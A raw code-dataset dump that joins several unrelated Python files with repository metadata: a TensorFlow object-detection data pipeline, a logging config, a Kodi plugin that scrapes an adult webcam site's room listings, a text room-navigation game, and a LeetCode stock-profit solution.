tf.cast(sample[\"objects\"][\"label\"], dtype=tf.float32)\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] * image_shape[1],\n bboxes[:, 1] * image_shape[0],\n 
bboxes[:, 2] * image_shape[1],\n bboxes[:, 3] * image_shape[0],\n ],\n axis=-1\n )\n return image, image_shape, bboxes, classes\n\n\ndef preprocess_data_v1(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n max_bboxes: int = 100,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n # image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.01)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n # return image, bboxes, bboxes_count[None], fmaps_shape\n return image, bboxes, scale, image_shape\n\n return _preprocess_data\n\n\ndef preprocess_data_v2(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.5)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n return image, bboxes[:, :4], bboxes[:, -1], fmaps_shape\n\n return _preprocess_data\n\n\n@tf.function\ndef _compute_targets_v1(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def 
build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n # ind_target_ = tf.concat([ind_target_, tf.expand_dims(level_min_area_indices, -1)], axis=0)\n\n # ind_target_ = tf.where(tf.equal(cls_target_[..., -1], 1.), ind_target_[..., 0], -1)[..., 
None]\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None]\n\n\n@tf.function\ndef _compute_targets_v2(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n mk_target_ = tf.zeros((tf.shape(bboxes)[0], 0, 1), dtype=tf.float32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n objects_mask = tf.reshape(level_cls_target[..., -1], (tf.shape(level_cls_target)[0], -1, 1))\n\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, 
locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n mk_target_ = tf.concat([mk_target_, objects_mask], axis=1)\n\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None], mk_target_\n\n\ndef inputs_targets_v1(image, bboxes, bboxes_count, fmaps_shape):\n inputs = {\n \"image\": image,\n \"bboxes\": bboxes,\n \"bboxes_count\": bboxes_count,\n \"fmaps_shape\": fmaps_shape,\n }\n return inputs\n\n\ndef inputs_targets_v2(image, cls_target, reg_target, ind_target, bboxes_cnt):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt\n }\n return inputs\n\n\ndef inputs_targets_v3(image, cls_target, reg_target, ind_target, bboxes_cnt, mask_target, ):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt,\n \"mask_target\": mask_target,\n }\n return inputs\n\n\ndef _load_data_from_tfrecord(ds_name, path=\"D:/datasets/\"):\n if ds_name == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True)\n elif ds_name == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n elif ds_name == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n return train, test, ds_info.splits[\"train\"].num_examples, ds_info.splits[\"test\"].num_examples\n\n\ndef create_pipeline_v1(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1):\n autotune = tf.data.AUTOTUNE\n\n train, test, train_num, test_num = _load_data_from_tfrecord(db)\n\n # if db == \"DPCB\":\n # (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"C:/works/datasets/\")\n # else:\n # train = None\n # test = None\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=_fmap_shapes(phi)),\n num_parallel_calls=autotune)\n train = train.shuffle(train_num)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0, 0), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.repeat().prefetch(autotune)\n return train, test\n\n\ndef create_pipeline_v2(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n _buffer = 1000\n\n if db == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True)\n elif db == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\", split=[\"train\", 
\"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n elif db == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n train_examples = ds_info.splits[\"train\"].num_examples\n test_examples = ds_info.splits[\"test\"].num_examples\n print(f\"[INFO] {db}: train( {train_examples} ), test( {test_examples} )\")\n\n train = train.map(preprocess_data_v2(\n phi=phi,\n mode=mode,\n fmap_shapes=_fmap_shapes(phi),\n debug=debug\n ), num_parallel_calls=autotune)\n\n train = (train.shuffle(_buffer, reshuffle_each_iteration=True).repeat())\n train = train.map(_compute_targets_v2, num_parallel_calls=autotune) # padded tensor.\n # train = train.batch(batch_size=batch_size, drop_remainder=True) # with _compute_targets_v1\n train = train.padded_batch(\n batch_size=batch_size,\n padding_values=(0., 0., 0., 0, 0, 0.),\n drop_remainder=True) # with _compute_targets_v2\n train = train.map(inputs_targets_v3, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n\n return train, test\n\n\ndef create_pipeline_test(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n\n if db == \"DPCB\":\n (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\")\n\n elif db == \"VOC\":\n (train, test) = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n elif db == \"VOC_mini\":\n (train, test) = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n else:\n train = None\n test = None\n\n feature_maps_shapes = _fmap_shapes(phi)\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=feature_maps_shapes, max_bboxes=100,\n debug=debug), num_parallel_calls=autotune)\n\n train = train.shuffle(1000)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0., 0.), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n return train, test\n\n\nif __name__ == '__main__':\n eps = 10\n bs = 1\n\n train_t, test_t = create_pipeline_v2(\n phi=config.PHI,\n batch_size=bs,\n # debug=True,\n db=\"VOC\"\n )\n\n \"\"\" \"\"\"\n # for ep in range(eps):\n # for step, inputs_batch in enumerate(train_t):\n # # _cls = inputs_batch['cls_target'].numpy()\n # # _loc = inputs_batch['loc_target'].numpy()\n # # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n #\n # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {_int[:, 0]}\")\n #\n # if np.min(_int) == 0:\n # break\n #\n # # if step > (16551 // bs) - 3:\n # # min_cnt = np.min(_int)\n # # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {min_cnt}\")\n\n \"\"\" \"\"\"\n\n # iterations = 1\n # for step, inputs_batch in enumerate(train_t):\n # # if (step + 1) > iterations:\n # # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _cls = inputs_batch['cls_target'].numpy()\n # _loc = inputs_batch['loc_target'].numpy()\n # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n # _mks = inputs_batch['mask_target'].numpy()\n #\n # if _int > 15:\n # break\n #\n # obj_cnt = _int[0, 0]\n # p7_mk = np.reshape(_cls[0, 8500:, -1], (5, 5))\n # p6_mk = np.reshape(_cls[0, 
8400:8500, -1], (10, 10))\n # p5_mk = np.reshape(_cls[0, 8000:8400, -1], (20, 20))\n #\n # p7_mk_obj = np.reshape(_mks[0, :, 8500:, 0], (obj_cnt, 5, 5))\n # p6_mk_obj = np.reshape(_mks[0, :, 8400:8500, 0], (obj_cnt, 10, 10))\n # p5_mk_obj = np.reshape(_mks[0, :, 8000:8400, 0], (obj_cnt, 20, 20))\n #\n # p7_ap = np.reshape(_cls[0, 8500:, -2], (5, 5))\n # p6_ap = np.reshape(_cls[0, 8400:8500, -2], (10, 10))\n # p5_ap = np.reshape(_cls[0, 8000:8400, -2], (20, 20))\n #\n # p7_ind = np.reshape(_ind[0, 8500:], (5, 5))\n # p6_ind = np.reshape(_ind[0, 8400:8500], (10, 10))\n # p5_ind = np.reshape(_ind[0, 8000:8400], (20, 20))\n\n \"\"\" \"\"\"\n\n # import matplotlib.pyplot as plt\n #\n # iterations = 10\n # print('test')\n # plt.figure(figsize=(10, 8))\n # for step, inputs_batch in enumerate(train_t):\n # if (step + 1) > iterations:\n # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _images = inputs_batch['image'].numpy()\n # _bboxes = inputs_batch['bboxes'].numpy()\n # _scales = inputs_batch['bboxes_count'].numpy()\n # _images_shape = inputs_batch['fmaps_shape'].numpy()\n #\n # _bboxes = tf.stack(\n # [\n # _bboxes[..., 1],\n # _bboxes[..., 0],\n # _bboxes[..., 3],\n # _bboxes[..., 2],\n # ],\n # axis=-1\n # )\n #\n # colors = np.array([[255.0, 0.0, 0.0]])\n # _images = tf.image.draw_bounding_boxes(\n # _images,\n # _bboxes,\n # colors=colors\n # )\n #\n # for i in range(bs):\n # plt.subplot(2, 2, i + 1)\n # plt.imshow(_images[i].numpy().astype(\"uint8\"))\n # # print(bboxes[i])\n # plt.tight_layout()\n # plt.pause(1)\n # # plt.close()\n\n \"\"\" \"\"\"\n\n # tfds.benchmark(train_t, batch_size=bs)\n # tfds.benchmark(train_t, batch_size=bs)\n\n # image : (Batch, None, None, 3)\n # bboxes : (Batch, None, 5)\n # bboxes_count : (Batch, 1)\n # fmaps_shape : (Batch, 5, 2)\n","repo_name":"gogo12235LYH/keras-sapd-v2","sub_path":"generators/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":33825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9432759477","text":"import logging\r\n\r\nlogger = logging.Logger(name=\"APP\", level=logging.DEBUG)\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\n\r\nconsole_handler = logging.StreamHandler()\r\nconsole_handler.setLevel(logging.CRITICAL)\r\nconsole_handler.setFormatter(formatter)\r\n\r\n\r\nfile_handler = logging.FileHandler(\"vkf.log\")\r\nfile_handler.setLevel(logging.DEBUG)\r\nfile_handler.setFormatter(formatter)\r\n\r\n\r\nlogger.addHandler(console_handler)\r\nlogger.addHandler(file_handler)\r\n","repo_name":"Saegl/vkf","sub_path":"vkf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32722464839","text":"# -*- coding: utf-8 -*-\n# Author: Lord Grey\n# Created : 01.03.2019\n# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html\n\nimport re\nimport xbmcgui\nimport xbmcplugin\nimport resources.lib.helper as helper\n\n\ndef get_cats():\n\t\"\"\"\n\tcrawls the Catergorys from xvideos.com\n\tand returns them as a list of dicts\n\n\t[{'category': 'Pornos auf Deutsch', 'link': 'https://xvideos.com/lang/deutsch'},\n\t {'category': '3d', 'link': 'https://xvideos.com/?k=3d&top'}]\n\t\"\"\"\n\turl = 'https://chaturbate.com'\n\tcats = []\n\tsoup = helper.get_soup(url)\n\tul = soup.find(\"ul\", class_=\"sub-nav\")\n\n\tfor li in 
ul.find_all(\"li\"):\n\t\tcats.append(\n\t\t\tdict([\n\t\t\t\t('category', li.text),\n\t\t\t\t('link', url + li.a.get('href'))\n\t\t\t]))\n\n\treturn cats\n\n\ndef get_vids(url, category='none'):\n\t\"\"\"\n\tcrawls a given url form chaturbate.com for videos\n\tand returns them as a list of dicts\n\tif a catergory is given it will be added to the dict\n\n\ta returnd dict looks like this\n\t\t KEYS VALUE\n\t[{ 'title': 'BF HAVE 8 INC BUT YOUR ',\n\t\t'link': 'https://chaturbate.com/nasty_girl_masturbate',\n\t'duration': '5 min',\n\t 'thumb': 'https://img-hw.com/videos/thumbs169/a3/ed/36/a3ed367bcb5a69a9ad.14.jpg',\n\t\t 'res': '720p',\n\t 'views': '13k',\n\t'uploader': 'hans',\n\t'category': 'Grany'}]\n\t\"\"\"\n\n\thardcoded = 'https://chaturbate.com'\n\tvideo_info = []\n\tvideos = []\n\n\tsoup = helper.get_soup(url)\n\n\tvideos = soup.find_all(\"li\", class_=\"room_list_room\")\n\n\tfor info in videos:\n\t\tres = ''\n\t\ttitle = info.find(\"a\", href=True).get('href')[1:-1]\n\t\tuploader = info.find(\"a\", href=True).get('href')\n\t\timg = info.find(\"a\", href=True).find('img').get('src')\n\n\t\t# views and time are only seperatot bei \",\" on the site\n\t\tduraview = info.find(\"li\", class_=\"cams\").text.split(\",\")\n\t\tviews = duraview[1]\n\n\t\t# if duraview[0].find(\"h\") != -1: #\n\t\t# h = float(duraview[0][:-4])\n\t\t# duration = (h * 60) * 60\n\n\t\t# else:\n\t\t# duration = duraview[0][:-5] * 60\n\n\t\tvideo_info.append(\n\t\t\tdict([\n\t\t\t\t('title', title),\n\t\t\t\t('link', hardcoded + uploader),\n\t\t\t\t('duration', 0),\n\t\t\t\t('thumb', img),\n\t\t\t\t('res', res),\n\t\t\t\t('views', views),\n\t\t\t\t('uploader', title),\n\t\t\t\t('category', category)\n\t\t\t]))\n\treturn video_info\n\n\ndef play_video(_handle, video):\n\t\"\"\"\n\tPlay a video by the provided path.\n\n\t:param path: Fully-qualified video URL\n\t:type path: str\n\t\"\"\"\n\n\tsoup = helper.get_soup(video)\n\tpattern = r\"\"\"https.*\\.m3u8\"\"\"\n\tlink = re.findall(pattern, str(soup))[0].replace(r'\\u002D', '-')\n\n\t# Create a playable item with a path to play.\n\tplay_item = xbmcgui.ListItem(path=link)\n\n\t# Pass the item to the Kodi player.\n\txbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)\n","repo_name":"Space2Walker/plugin.video.chaturbate","sub_path":"resources/lib/chaturbate.py","file_name":"chaturbate.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34195573405","text":"rooms = {'1':{'name':'room1', 'description':'this is room one ', 'exit':{'east': '2', 'south': '4'}, 'invent':[]},\n '2':{'name':'room2', 'description':'this is room two ', 'exit':{'west': '1','east': '3','south': '5'}, 'invent':[]},\n '3':{'name':'room3', 'description':'this is room three ', 'exit':{'west': '2','south': '6'}, 'invent':[]},\n '4':{'name':'room4', 'description':'this is room four ', 'exit':{'north': '1','south': '7','east': '5'}, 'invent':['macbook']},\n '5':{'name':'room5', 'description':'this is room five ', 'exit':{'north': '2','south': '8','east': '6','west': '4'}, 'invent':['food']},\n '6':{'name':'room6', 'description':'this is room six ', 'exit':{'west': '5','south': '9','north': '3'}, 'invent':['botle']},\n '7':{'name':'room7', 'description':'this is room seven ', 'exit':{'north': '4','east': '8'}, 'invent':[]},\n '8':{'name':'room8', 'description':'this is room eight ', 'exit':{'north': '5','east': '9','west': '7'}, 'invent':['book']},\n '9':{'name':'room9', 'description':'this 
is room nine ', 'exit':{'north': '6', 'west': '8'}, 'invent':[]},\n }\n\n\n\nchar = {'position':'1', 'invent':['apple']}\n\n#1 2 3\n#4 5 6\n#7 8 9\n\n\ndef move(direction):\n global char\n position=char['position']\n room_id=rooms[position]['exit']\n if room_id.get(direction):\n char['position']=str(room_id.get(direction))\n describe_room()\n else:\n print(\"No such exit\")\n\n\ndef describe_room(arg=None):\n id=char['position']\n print(\"___________\\n|{0} \\n|Description: {1}\\n|Invents: {2}\\n___________\".format(rooms[id]['name'], rooms[id]['description'], rooms[id]['invent']))\n\n\ndef describe_pocket(arg=None):\n print(\"Your pocket has: {0}\".format(char['invent']))\n\n\ndef describe_handlers(arg=None):\n print(\"Handler list:\")\n for i in handlers.keys():\n print(\"- \" + i)\n\n\ndef describe_room_directions(arg=None):\n id = char['position']\n exits = rooms[id]['exit']\n for i in exits:\n room_id = exits[i]\n print(i, rooms[room_id]['name'])\n\n\ndef move_invent(move_from, move_to):\n if len(move_from) > 0:\n thing = str(input(\"What to take hare? \"))\n if thing in move_from:\n move_from.remove(thing)\n move_to.append(thing)\n return thing\n else:\n return False\n else:\n return False\n\n\ndef put(arg=None):\n movement=move_invent(char['invent'], rooms[char['position']]['invent'])\n if movement:\n print(\"You lef \" + movement + \" in this room\")\n else:\n print(\"You don't have it\")\n\n\ndef take(arg=None):\n movement=move_invent(rooms[char['position']]['invent'], char['invent'])\n if movement:\n print(\"You took \"+ movement + \" in this room\")\n else:\n print(\"No such thing in this room\")\n\n\nhandlers = {'list': describe_handlers,\n 'look_room': describe_room,\n 'look_pocket': describe_pocket,\n 'directions': describe_room_directions,\n 'put': put,\n 'take': take,\n 'west':move,\n 'east':move,\n 'north':move,\n 'south':move}\n\n\ndef main():\n describe_handlers()\n\n while True:\n command = input(\"Do your choice \")\n\n if len(command) != 0 and handlers.get(command.split()[0]):\n handlers[command.split()[0]](command)\n else:\n print(\"No such choice, please try something from list\")\n\nmain()\n","repo_name":"vprotsenko/python-","sub_path":"homework/lesson16/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14408654233","text":"from typing import List, Optional\nimport math\nimport numpy as np\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if nums is None:\n return 0\n n = len(prices)\n if n == 1:\n return 0\n\n minprice = np.inf\n maxplus = 0\n for i in prices:\n if i < minprice:\n minprice = i\n continue\n\n if (i - minprice) > maxplus:\n maxplus = i - minprice\n\n return maxplus\n\nif __name__ == '__main__':\n nums = [7,1,5,3,6,4]\n nums = [7,6,4,3,1]\n res = Solution().maxProfit(prices=nums)\n print(res)","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo121.py","file_name":"demo121.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70193062410","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport evaluation as 